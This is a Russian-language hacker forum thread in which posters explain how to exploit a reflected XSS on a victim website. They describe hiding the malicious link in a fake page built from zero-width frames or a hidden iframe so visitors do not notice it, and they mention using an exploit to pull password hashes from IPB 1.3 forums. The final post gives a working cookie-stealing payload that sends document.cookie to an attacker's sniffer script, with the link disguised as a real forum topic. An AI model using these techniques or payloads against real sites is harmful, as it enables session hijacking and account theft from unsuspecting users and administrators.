Что-то сайт какой-то странный, рисуночек такой "Go Away!"

WizART - так просто, типа, обозначают сайт жертву. Victim - жертва. Типа тоже самое: www.жертва.com
...
Это пассивная XSS. Поэтому надо лепить липовую (фэйковую) страницу построенную на фреймах (или окно будет новое открываться) и там уже будет ссылка на эту XSS.

__________________
+ (это не крестик, это плюсик!)
__________________
•
•
•

Фэйковый - липовый
Делай сайт на фреймах - левый нулевой, правый 100% (или просто iframe используй с шириной/высотой 0) тот который 100% будет типа липы. Можешь туда забабахать какое-нить изображение. В фрамесете путь до левого будет примерно такой:
+ в самом фрамесете подстра***ся и влепи код (но работать будет тока в ИЕ)
Чтобы большинство не видело что идет загрузка с другого сайта.
...
Можешь еще открыть новое Попап окно без статуса, прокрутки и т.п. и там какую-нить липовую рекламу поместить, но у некоторых может стоять резалка (или файервол) на открытие новых окон и обрубиться.

__________________
+ (это не крестик, это плюсик!)
__________________
•
•
•

в IPB 1.3 проще хэш сплойтом утянуть чем с xss париться.

Grrl, ну не скажи... с некоторых 1.3 Final и"Русского модифицированного"
мне сплоиты не вытягивали хэши

Дак тебе не кто и негарантировал что сплойты на всех форумах работать будут...

Вы от куда попадали ? тутанхамоны наши =)

хы, сказать так: Смотри какую я тему намутил и ссылку (http://victim.com/?c='><script>img = new Image(); img.src = 'http://путь_до_снифера.ru/snifer.php?'+document.cookie;</script>). название ссылки - путь до реальной темы на форуме (для реальности), а адрес ссылки - xss . Не пинайте сильно . Если админ лох - прокатит